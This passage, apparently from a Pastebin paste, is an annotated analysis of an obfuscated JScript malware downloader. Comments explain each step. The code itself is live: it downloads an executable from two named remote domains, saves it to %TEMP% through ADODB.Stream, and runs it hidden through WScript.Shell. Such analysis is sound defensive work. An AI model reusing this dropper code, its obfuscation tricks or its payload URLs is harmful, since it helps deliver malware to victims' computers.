  566. //if(kuzut < 29989)return false;
  567. // if (kuzut[0]!= 77 || kuzut[1]!= 90)return false;
  568.  
  569. /****
  570. This will evaluate to true based on what was assigned to SayPaymorris_FROG2TRUEFALSE, earlier on. As a result, we execute this block.
  571.  
  572. ****/
  573. if (SayPaymorris_FROG2TRUEFALSE) {
  574. /****
  575. var SayPaymorris_FROG2opOpOp = new ActiveXObject(ADODB.Stream);
  576. ****/
  577. var SayPaymorris_FROG2opOpOp = new SayPaymorris_FROG2LitoyDISK(Limbus2000());
  578.  
  579. /****
  580. Variable declared and never used.
  581. ****/
  582. SayPaymorris_FROGGaSMa = "Valar10Morgulis";
  583.  
  584. /****
  585. Re-redeclaration of the function for ease of viewing.
  586.  
  587. function dedlyb(n, enc){
  588. newfoundland = Math.floor(n);
  589. if (x < 256*256*256) {
  590. bytes = [max + 2, Math.floor(x / 256 / 256), Math.floor(arbiter / 256) % 256, x % 256 ];
  591. } else if (x < 256*256*256*256) {
  592. flirtation = [max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(seaboard / 256) % 256, x % 256];
  593. }
  594. }
  595. ****/
  596. var dedlyb = new Function("n, enc", " newfoundland = Math.floor(n); if (x < 256*256*256) { bytes = [ max + 2, Math.floor(x / 256 / 256), Math.floor(arbiter / 256) % 256, x % 256 ]; } else if (x < 256*256*256*256) { flirtation = [ max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(seaboard / 256) % 256, x % 256 ]; }");
  597.  
  598. /****
  599. Re-redeclaration of the function for ease of viewing.
  600.  
  601. function silaBitsa(WARHORSE, WARHORSE2) {
  602. WARHORSE[WARHORSE2]();
  603. }
  604. ****/
  605. var silaBitsa = new Function("WARHORSE,WARHORSE2", "WARHORSE[WARHORSE2]();");
  606.  
  607. /****
  608. Re-redeclaration of the function for ease of viewing.
  609.  
  610. function silaBitsa2(WARHORSE, WARHORSE2) {
  611. WARHORSE.write(WARHORSE2);
  612. }
  613. ****/
  614. var silaBitsa2 = new Function("WARHORSE,WARHORSE2", "WARHORSE.write(WARHORSE2);");
  615.  
  616. /****
  617. silaBitsa(ActiveXObject(ADODB.Stream), "open");
  618.  
  619. After the call to the function silaBitsa(), the result becomes:
  620. ActiveXObject(ADODB.Stream).open();
  621. ****/
  622. silaBitsa(SayPaymorris_FROG2opOpOp, SayPaymorris_FROG2OCHENA);
  623.  
  624. /****
  625. ActiveXObject(ADODB.Stream).type = 1;
  626. The ADO Stream Type property sets the StreamTypeEnum value; which passing in 1 indicates the data is to be stored as binary data.
  627. ****/
  628. SayPaymorris_FROG2opOpOp[SayPaymorris_FROG2SPASPI] = SayPaymorris_FROG2chosen;
  629.  
  630. /****
  631. silaBitsa2(ActiveXObject(ADODB.Stream), ActiveXObject(MSXML2.XMLHTTP).ResponseBody);
  632.  
  633. After the call to the function silaBitsa2(), the result becomes:
  634. ActiveXObject(ADODB.Stream).write(ActiveXObject(MSXML2.XMLHTTP).Responsebody);
  635. ****/
  636. silaBitsa2(SayPaymorris_FROG2opOpOp, kuzut);
  637.  
  638. /****
  639. Variable declared and never used.
  640. ****/
  641. SayPaymorris_FROG2XWaxeQhw = "Valar11Morgulis";
  642.  
  643. /****
  644. ActiveXObject(ADODB.Stream).position = 0;
  645. The ADO Stream Position property sets the Long value of the offset from the beginning of the stream to 0.
  646. ****/
  647. SayPaymorris_FROG2opOpOp["position"] = 0;
  648.  
  649. /****
  650. Variable declared and never used.
  651. ****/
  652. SayPaymorris_FROG2krDwvrh = "Valar12Morgulis";
  653.  
  654. /****
  655. This will append to the SayPaymorris_FROG2CHICKA variable the .exe string.
  656.  
  657. The resulting file path location looks something like this:
  658. %TEMP%/XXSkRjf1 + ".exe"
  659. ****/
  660. SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + SayPaymorris_FROG2SIDRENKOV;
  661.  
  662. /****
  663. SayPaymorris_FROG2opOpOp.saveToFile(SayPaymorris_FROG2CHICKA, 26/13);
  664.  
  665. ActiveXObject(ADODB.Stream).saveToFile("%TEMP%/XXSkRjf1.exe", 2);
  666.  
  667. This calls the ADO.saveToFile() method to save the binary contents of a Stream to a file.
  668. ****/
  669. SayPaymorris_FROG2opOpOp["cWARHORSE2F2WARHORSEZVWARHORSERvRmlsZQ==".pineapple()](SayPaymorris_FROG2CHICKA, 26 / 13);
  670.  
  671. /****
  672. Variable declared and never used.
  673. ****/
  674. SayPaymorris_FROG2SswQdi = "Valar13Morgulis";
  675.  
  676. /****
  677. ActiveXObject(ADODB.Stream).close();
  678.  
  679. This calls the ADO.close() method to close any ADO objects and their dependents.
  680. ****/
  681. SayPaymorris_FROG2opOpOp.close();
  682.  
  683. /****
  684. ActiveXObject(WScript.Shell).Run("%TEMP%/XXSkRjf1.exe", 0, false);
  685.  
  686. This calls the Run() method for the WScript.Shell Object passing in the file path name "%TEMP%/XXSkRjf1.exe", the Window Style of 0 indicating to hide the window, and the WaitOnReturn value to false to prevent the WScript from waiting for the program to finish execution.
  687. ****/
  688. SayPaymorris_oldBitch[SayPaymorris_FROG2promises](SayPaymorris_FROG2CHICKA, 0, false);
  689.  
  690. /****
  691. This is our stopping condition of the for-loop used to call this function.
  692. ****/
  693. return true;
  694. }
  695. } catch (exception2) {
  696. return false;
  697. }
  698. };
  699.  
  700. /****
  701. SayPaymorris_SayNoNo contains the string "WARHORSE"; which when run through the pineapple() method returns an empty string.
  702. This essentially becomes, eval();
  703. ****/
  704. eval(SayPaymorris_SayNoNo.pineapple());
  705.  
  706. /****
  707. The variable SayPaymorrisFPADRML is an empty string.
  708. Call to this function will perform eval(), again.
  709. ****/
  710. SayPaymorrisFPADZO_ZO(SayPaymorrisFPADRML);
  711.  
  712. var SayPaymorris_FROGodnoklassYO = 1;
  713.  
  714. /****
  715. var SayPaymorris_FROG2_a5 = "WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=ZZZWARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhHZZZWARHORSE".split("ZZZ");
  716.  
  717. var SayPaymorris_FROG2_a5 = ["WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=", "WARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhH", "WARHORSE"];
  718. After decoding:
  719. var SayPaymorris_FROG2_a5 = ["adelaidemotorshow.com.au/hg65fyJHG?", "trombositting.org/af/hg65fyJHG", ""];
  720. ****/
  721. var SayPaymorris_FROG2_a5 = ('WARHORSEYWRlbGFpZGVtb3RvcnNob3cuY29tLmF1L2hnWARHORSENjVmeUpIRz8=ZZZ' + 'WARHORSEdHJvbWJvc2l0dGluZy5vcmcvYWYvaGc2NWZ5SkhH' + 'ZZZWARHORSE').split("ZZZ");
  722.  
  723. /****
  724. This function, when called, prepends "http://" to the item at index SayPaymorris_FROG2HORDA5 of array SayPaymorris_FROG2_a5 after base64 decoding.
  725.  
  726. Re-redeclaration of the function for ease of viewing.
  727.  
  728. function WARHORSE500(SayPaymorris_FROG2_a5, SayPaymorris_FROG2HORDA5) {
  729. return SayPaymorris_FROG2_bChosteck.pineapple() + SayPaymorris_FROG2_a5[SayPaymorris_FROG2HORDA5].pineapple();
  730. }
  731. ****/
  732. var WARHORSE500 = new Function("SayPaymorris_FROG2_a5,SayPaymorris_FROG2HORDA5", 'return SayPaymorris_FROG2_bChosteck.pineapple() + SayPaymorris_FROG2_a5[SayPaymorris_FROG2HORDA5].pineapple();');
  733.  
  734. for (SayPaymorris_FROG2HORDA5 in SayPaymorris_FROG2_a5) {
  735. SayPaymorris_FROGodnoklassYO++;
  736.  
  737. /****
  738. Call to function SayPaymorris_ECOPLAT(). The calls are processed in order, seen below, and for-loop execution stops if the function calls returns true (i.e. successful call to the remote servers).
  739. First call, SayPaymorris_ECOPLAT("http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", XXSkRjf1);
  740. Second call, SayPaymorris_ECOPLAT("http://trombositting.org/af/hg65fyJHG"?XXSkRjf=XXSkRjf", XXSkRjf2);
  741. ****/
  742. if (SayPaymorris_ECOPLAT(WARHORSE500(SayPaymorris_FROG2_a5, SayPaymorris_FROG2HORDA5) + CNPK(SayPaymorris_FROGodnoklass) + SayPaymorris_FROGodnoklass, SayPaymorris_FROGodnoklass + SayPaymorris_FROGodnoklassYO)) {
  743. break;
  744. }
  745. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!